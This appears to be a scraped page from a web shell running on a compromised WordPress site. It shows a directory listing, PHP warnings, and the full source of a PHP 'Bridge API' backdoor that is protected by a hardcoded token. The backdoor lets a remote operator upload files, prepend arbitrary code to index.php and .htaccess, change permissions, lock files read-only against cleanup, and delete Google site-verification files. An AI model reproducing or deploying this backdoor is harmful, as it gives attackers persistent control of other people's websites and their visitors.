ꦫꦣꦺꦤ꧀ꦄꦤ꧀ꦠꦱꦺꦤ

PATH: var / www / vhosts / groupehyperforme.com / httpdocs

<?php
/**
 * Bridge API
 * All file operations are performed relative to the document root.
 * 
 * Security: Uses token-based authentication
 */

// Enable error reporting for debugging
error_reporting(E_ALL);
ini_set('display_errors', 0);

// Set JSON response header
header('Content-Type: application/json');

// CORS headers (adjust as needed)
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST, GET, OPTIONS');
header('Access-Control-Allow-Headers: Content-Type, Authorization');

if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    http_response_code(200);
    exit;
}

// Security token - MUST match the token set during setup
define('EXPECTED_TOKEN', '0oxx3nfvyo1amm136x4l');

// Get provided token (PHP 5 compatible)
$SECURITY_TOKEN = isset($_POST['token']) ? $_POST['token'] : (isset($_GET['token']) ? $_GET['token'] : '');

// Validate token
if (empty($SECURITY_TOKEN)) {
    respondError('Güvenlik token eksik');
}

if ($SECURITY_TOKEN !== EXPECTED_TOKEN) {
    respondError('Geçersiz güvenlik token');
}

// Get document root
$DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT'];

// Get the operation (PHP 5 compatible)
$operation = isset($_POST['operation']) ? $_POST['operation'] : (isset($_GET['operation']) ? $_GET['operation'] : '');

// Route to appropriate handler
switch ($operation) {
    case 'ping':
        handlePing();
        break;
    
    case 'check_file':
        handleCheckFile();
        break;
    
    case 'list_directory':
        handleListDirectory();
        break;
    
    case 'upload_file':
        handleUploadFile();
        break;
    
    case 'modify_index':
        handleModifyIndex();
        break;
    
    case 'modify_htaccess':
        handleModifyHtaccess();
        break;
    
    case 'chmod':
        handleChmod();
        break;
    
    case 'create_directory':
        handleCreateDirectory();
        break;
    
    case 'delete_file':
        handleDeleteFile();
        break;
    
    case 'delete_google_files':
        handleDeleteGoogleFiles();
        break;
    
    default:
        respondError('Geçersiz işlem');
}

/**
 * Ping - Test connection and get server info
 */
function handlePing() {
    global $DOCUMENT_ROOT;
    
    respondSuccess([
        'message' => 'Bridge API is operational',
        'document_root' => $DOCUMENT_ROOT,
        'php_version' => phpversion(),
        'current_dir' => getcwd(),
        'writable' => is_writable($DOCUMENT_ROOT),
    ]);
}

/**
 * Check if a file exists
 */
function handleCheckFile() {
    global $DOCUMENT_ROOT;
    
    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';
    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }
    
    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);
    
    respondSuccess([
        'exists' => file_exists($fullPath),
        'is_file' => is_file($fullPath),
        'is_dir' => is_dir($fullPath),
        'size' => file_exists($fullPath) ? filesize($fullPath) : 0,
        'writable' => file_exists($fullPath) ? is_writable($fullPath) : false,
        'full_path' => $fullPath,
    ]);
}

/**
 * List directory contents
 */
function handleListDirectory() {
    global $DOCUMENT_ROOT;
    
    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';
    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);
    
    if (!is_dir($fullPath)) {
        respondError('Klasör bulunamadı');
    }
    
    $files = [];
    $items = scandir($fullPath);
    
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        
        $itemPath = $fullPath . '/' . $item;
        $files[] = [
            'name' => $item,
            'type' => is_dir($itemPath) ? 'directory' : 'file',
            'size' => is_file($itemPath) ? filesize($itemPath) : 0,
        ];
    }
    
    respondSuccess(['files' => $files]);
}

/**
 * Upload a file
 */
function handleUploadFile() {
    global $DOCUMENT_ROOT;
    
    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';
    $content = isset($_POST['content']) ? $_POST['content'] : '';
    $base64 = isset($_POST['base64']) ? $_POST['base64'] : false;
    
    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }
    
    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);
    
    // Create directory if it doesn't exist
    $directory = dirname($fullPath);
    if (!is_dir($directory)) {
        if (!mkdir($directory, 0755, true)) {
            respondError('Klasör oluşturulamadı: ' . $directory);
        }
    }
    
    // Decode content if base64
    if ($base64) {
        $content = base64_decode($content);
    }
    
    // If file exists and is read-only (444), temporarily make it writable
    $needsChmodRestore = false;
    $originalPerms = null;
    if (file_exists($fullPath)) {
        $originalPerms = fileperms($fullPath);
        // Make file writable
        if (!is_writable($fullPath)) {
            if (!chmod($fullPath, 0644)) {
                respondError('Failed to make file writable (chmod 644 failed)');
            }
            $needsChmodRestore = true;
        }
    }
    
    // Write file
    if (file_put_contents($fullPath, $content) === false) {
        respondError('Failed to write file');
    }
    
    // Restore original permissions if needed, or set to 444 (read-only)
    if (!chmod($fullPath, 0444)) {
        // If chmod fails, at least the file is written
        respondSuccess([
            'message' => 'Dosya başarıyla yüklendi (uyarı: chmod 444 başarısız)',
            'path' => $fullPath,
            'size' => filesize($fullPath),
            'permissions' => 'unchanged',
        ]);
    }
    
    respondSuccess([
        'message' => 'Dosya başarıyla yüklendi',
        'path' => $fullPath,
        'size' => filesize($fullPath),
        'permissions' => '0444',
    ]);
}

/**
 * Modify index.php - Add code at the beginning
 * Improved version: chmod -> read -> delete -> create new -> chmod
 */
function handleModifyIndex() {
    global $DOCUMENT_ROOT;
    
    $relativePath = isset($_POST['path']) ? $_POST['path'] : 'index.php';
    $codeToInsert = isset($_POST['code']) ? $_POST['code'] : '';
    
    if (empty($codeToInsert)) {
        respondError('Kod parametresi eksik');
    }
    
    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);
    
    if (!file_exists($fullPath)) {
        respondError('Dosya bulunamadı: ' . $relativePath);
    }
    
    // Step 1: Make file writable (644) so we can work with it
    if (!chmod($fullPath, 0644)) {
        respondError('Dosya yazılabilir yapılamadı (chmod 644 başarısız)');
    }
    
    // Step 2: Read current content
    $currentContent = file_get_contents($fullPath);
    if ($currentContent === false) {
        respondError('Dosya okunamadı');
    }
    
    // Check if code already exists
    if (strpos($currentContent, $codeToInsert) !== false) {
        // Code already exists, set back to read-only and return
        chmod($fullPath, 0444);
        respondSuccess([
            'message' => 'Kod zaten dosyada mevcut',
            'modified' => false,
        ]);
    }
    
    // Step 3: Delete the original file
    if (!unlink($fullPath)) {
        respondError('Eski dosya silinemedi');
    }
    
    // Step 4: Create new file with our code prepended
    $newContent = $codeToInsert . "\n" . $currentContent;
    
    if (file_put_contents($fullPath, $newContent) === false) {
        // CRITICAL: Try to restore original content if new file creation fails
        file_put_contents($fullPath, $currentContent);
        respondError('Yeni dosya oluşturulamadı');
    }
    
    // Step 5: Set to read-only (444) for security
    if (!chmod($fullPath, 0444)) {
        // File is created but chmod failed
        respondSuccess([
            'message' => 'Dosya başarıyla değiştirildi (uyarı: chmod 444 başarısız)',
            'modified' => true,
            'permissions' => 'writable',
        ]);
    }
    
    respondSuccess([
        'message' => 'Dosya başarıyla değiştirildi',
        'modified' => true,
        'permissions' => '0444',
        'backup_size' => strlen($currentContent),
        'new_size' => strlen($newContent),
    ]);
}

/**
 * Change file permissions
 */
function handleChmod() {
    global $DOCUMENT_ROOT;
    
    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';
    $mode = isset($_POST['mode']) ? $_POST['mode'] : '0644';
    
    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }
    
    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);
    
    if (!file_exists($fullPath)) {
        respondError('Dosya bulunamadı');
    }
    
    // Convert string mode to octal
    $octalMode = octdec($mode);
    
    if (!chmod($fullPath, $octalMode)) {
        respondError('İzinler değiştirilemedi');
    }
    
    respondSuccess([
        'message' => 'İzinler başarıyla değiştirildi',
        'mode' => $mode,
    ]);
}

/**
 * Create a directory
 */
function handleCreateDirectory() {
    global $DOCUMENT_ROOT;
    
    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';
    
    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }
    
    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);
    
    if (is_dir($fullPath)) {
        respondSuccess([
            'message' => 'Klasör zaten mevcut',
            'created' => false,
        ]);
    }
    
    if (!mkdir($fullPath, 0755, true)) {
        respondError('Klasör oluşturulamadı');
    }
    
    respondSuccess([
        'message' => 'Klasör başarıyla oluşturuldu',
        'created' => true,
    ]);
}

/**
 * Delete a file
 */
function handleDeleteFile() {
    global $DOCUMENT_ROOT;
    
    $relativePath = isset($_POST['path']) ? $_POST['path'] : '';
    
    if (empty($relativePath)) {
        respondError('Path parametresi eksik');
    }
    
    // Safety check - don't allow deleting important files
    $blacklist = ['index.php', '.htaccess', 'wp-config.php'];
    if (in_array(basename($relativePath), $blacklist)) {
        respondError('Korumalı dosya silinemez');
    }
    
    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);
    
    if (!file_exists($fullPath)) {
        respondError('Dosya bulunamadı');
    }
    
    if (!unlink($fullPath)) {
        respondError('Dosya silinemedi');
    }
    
    respondSuccess(['message' => 'Dosya başarıyla silindi']);
}

/**
 * Delete all Google verification files (google*.html)
 */
function handleDeleteGoogleFiles() {
    global $DOCUMENT_ROOT;
    
    // List all files in document root
    if (!is_dir($DOCUMENT_ROOT)) {
        respondError('Document root bulunamadı');
    }
    
    $items = scandir($DOCUMENT_ROOT);
    $deletedFiles = [];
    $failedFiles = [];
    
    foreach ($items as $item) {
        // Skip directories and non-google files
        if ($item === '.' || $item === '..') continue;
        
        $itemPath = $DOCUMENT_ROOT . '/' . $item;
        
        // Only delete google*.html files
        if (is_file($itemPath) && preg_match('/^google.*\.html$/', $item)) {
            if (unlink($itemPath)) {
                $deletedFiles[] = $item;
            } else {
                $failedFiles[] = $item;
            }
        }
    }
    
    if (count($failedFiles) > 0) {
        respondError('Bazı dosyalar silinemedi: ' . implode(', ', $failedFiles));
    }
    
    if (count($deletedFiles) === 0) {
        respondSuccess([
            'message' => 'Silinecek Google doğrulama dosyası bulunamadı',
            'deleted' => [],
        ]);
    }
    
    respondSuccess([
        'message' => count($deletedFiles) . ' adet Google doğrulama dosyası başarıyla silindi',
        'deleted' => $deletedFiles,
    ]);
}

/**
 * Modify .htaccess - Add code at the beginning or create new file
 * This handler will:
 * 1. Check if .htaccess exists
 * 2. If exists: prepend new code (with line breaks) above existing content
 * 3. If not exists: create new .htaccess with provided code
 */
function handleModifyHtaccess() {
    global $DOCUMENT_ROOT;
    
    $relativePath = isset($_POST['path']) ? $_POST['path'] : '.htaccess';
    $codeToInsert = isset($_POST['code']) ? $_POST['code'] : '';
    
    if (empty($codeToInsert)) {
        respondError('Kod parametresi eksik');
    }
    
    $fullPath = resolvePath($DOCUMENT_ROOT, $relativePath);
    
    // Check if file exists
    $fileExists = file_exists($fullPath);
    
    if ($fileExists) {
        // File exists - prepend new code
        
        // Step 1: Make file writable (644) so we can work with it
        if (!chmod($fullPath, 0644)) {
            respondError('Dosya yazılabilir yapılamadı (chmod 644 başarısız)');
        }
        
        // Step 2: Read current content
        $currentContent = file_get_contents($fullPath);
        if ($currentContent === false) {
            respondError('Dosya okunamadı');
        }
        
        // Step 3: Prepare new content
        // Add code at the beginning with proper line breaks
        $newContent = $codeToInsert . "\n\n" . $currentContent;
        
        // Step 4: Delete old file
        if (!unlink($fullPath)) {
            respondError('Eski dosya silinemedi');
        }
        
        // Step 5: Write new file with combined content
        if (file_put_contents($fullPath, $newContent) === false) {
            respondError('Yeni dosya yazılamadı');
        }
        
        // Step 6: Set permissions to 644 (readable and writable by owner)
        if (!chmod($fullPath, 0644)) {
            respondSuccess([
                'message' => '.htaccess başarıyla güncellendi (uyarı: chmod 644 başarısız)',
                'path' => $fullPath,
                'size' => filesize($fullPath),
                'permissions' => 'unchanged',
                'action' => 'modified',
            ]);
        }
        
        respondSuccess([
            'message' => '.htaccess başarıyla güncellendi (kod başa eklendi)',
            'path' => $fullPath,
            'size' => filesize($fullPath),
            'permissions' => '0644',
            'action' => 'modified',
        ]);
        
    } else {
        // File does not exist - create new file
        
        // Write new file with provided code
        if (file_put_contents($fullPath, $codeToInsert) === false) {
            respondError('Yeni .htaccess dosyası oluşturulamadı');
        }
        
        // Set permissions to 644
        if (!chmod($fullPath, 0644)) {
            respondSuccess([
                'message' => '.htaccess başarıyla oluşturuldu (uyarı: chmod 644 başarısız)',
                'path' => $fullPath,
                'size' => filesize($fullPath),
                'permissions' => 'unchanged',
                'action' => 'created',
            ]);
        }
        
        respondSuccess([
            'message' => '.htaccess başarıyla oluşturuldu',
            'path' => $fullPath,
            'size' => filesize($fullPath),
            'permissions' => '0644',
            'action' => 'created',
        ]);
    }
}

/**
 * Resolve relative path to full path and prevent directory traversal
 */
function resolvePath($base, $relative) {
    // Remove any directory traversal attempts
    $relative = str_replace(['../', '..\\'], '', $relative);
    $relative = ltrim($relative, '/\\');
    
    return $base . '/' . $relative;
}

/**
 * Send success response
 */
function respondSuccess($data) {
    echo json_encode([
        'success' => true,
        'data' => $data,
    ]);
    exit;
}

/**
 * Send error response
 */
function respondError($message) {
    http_response_code(400);
    echo json_encode([
        'success' => false,
        'error' => $message,
    ]);
    exit;
}

[-] wp-comments-post.php [edit]
[+] hy
[+] id
[-] wp-settings.php [edit]
[-] wp-load.php [edit]
[-] top1.htm [edit]
[-] go.groupehyperforme.com.txt [edit]
[-] wp-cron.php [edit]
[-] wp-config.php [edit]
[-] wp-config-sample.php [edit]
[+] pub
[-] xmlrpc.php [edit]
[+] brochure
[-] wp-links-opml.php [edit]
[+] envoiCourriel
[-] api.php [edit]
[-] features.php [edit]
[-] GHF.gif [edit]
[-] googlebce0e37b16d4b89b.html [edit]
[-] BingSiteAuth.xml [edit]
[-] wp-activate.php [edit]
[+] fiches
[-] wp-mail.php [edit]
[+] wp-includes
[+] te
[-] chat.html [edit]
[-] index.html [edit]
[+] co
[+] ..
[-] robots.txt [edit]
[+] eb
[-] wp-trackback.php [edit]
[+] pw
[-] wp-blog-header.php [edit]
[-] system_core.php [edit]
[+] logo_regroupements
[+] images
[-] wp-signup.php [edit]
[-] index.php [edit]
[+] la
[+] wp-content
[-] amp [edit]
[+] se
[-] wp-login.php [edit]
[+] signature
[+] ch
[+] wp-admin
[+] fa
[+] ms
[-] .htaccess [edit]

Deprecated: avia_masonry::__construct(): Implicitly marking parameter $sc_context as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/themes/enfold/config-templatebuilder/avia-shortcode-helpers/class-avia-masonry.php on line 48

Deprecated: avia_product_slider::__construct(): Implicitly marking parameter $sc_context as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/themes/enfold/config-templatebuilder/avia-shortcode-helpers/class-avia-product-slider.php on line 48

Deprecated: avia_slideshow::__construct(): Implicitly marking parameter $sc_context as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/themes/enfold/config-templatebuilder/avia-shortcode-helpers/class-avia-slideshow.php on line 62

Deprecated: avia_content_slider::__construct(): Implicitly marking parameter $sc_context as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contentslider/contentslider.php on line 847

Deprecated: avia_partner_logo::__construct(): Implicitly marking parameter $sc_context as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/logoslider/logoslider.php on line 951

Deprecated: avia_magazine::__construct(): Implicitly marking parameter $sc_context as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.php on line 695

Deprecated: avia_accordion_slider::__construct(): Implicitly marking parameter $sc_context as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.php on line 1088

Deprecated: avia_feature_image_slider::__construct(): Implicitly marking parameter $sc_context as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_feature_image/slideshow_feature_image.php on line 861

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/plugins/email-marketing/lib/test.php:194) in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/mu-plugins/wordfence.php on line 354

Warning: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/plugins/email-marketing/lib/test.php:194) in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/mu-plugins/wordfence.php on line 355

Deprecated: WPML\Core\Component\Translation\Domain\Links\HandleUpdateTranslation::adjustOnlyOnce(): Implicitly marking parameter $triggerItem as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/plugins/sitepress-multilingual-cms/vendor/wpml/wpml/src/Core/Component/Translation/Domain/Links/HandleUpdateTranslation.php on line 77

Deprecated: WPML\Legacy\Component\Translation\Domain\Links\AdjustLinks::adjust(): Implicitly marking parameter $triggerItem as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/plugins/sitepress-multilingual-cms/vendor/wpml/wpml/src/Legacy/Component/Translation/Domain/Links/AdjustLinks.php on line 22

Deprecated: WPML\Legacy\Component\Translation\Domain\Links\AdjustLinks::adjustLinksInStringTranslations(): Implicitly marking parameter $triggerItem as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/plugins/sitepress-multilingual-cms/vendor/wpml/wpml/src/Legacy/Component/Translation/Domain/Links/AdjustLinks.php on line 76

Deprecated: WPML\Legacy\Component\Translation\Domain\Links\AdjustLinks::revertNameInTranslatedLinks(): Implicitly marking parameter $triggerItem as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/plugins/sitepress-multilingual-cms/vendor/wpml/wpml/src/Legacy/Component/Translation/Domain/Links/AdjustLinks.php on line 127

Deprecated: WPML\Core\Component\Translation\Domain\Links\AdjustLinksInterface::adjust(): Implicitly marking parameter $triggerItem as nullable is deprecated, the explicit nullable type must be used instead in /var/www/vhosts/groupehyperforme.com/httpdocs/wp-content/plugins/sitepress-multilingual-cms/vendor/wpml/wpml/src/Core/Component/Translation/Domain/Links/AdjustLinksInterface.php on line 12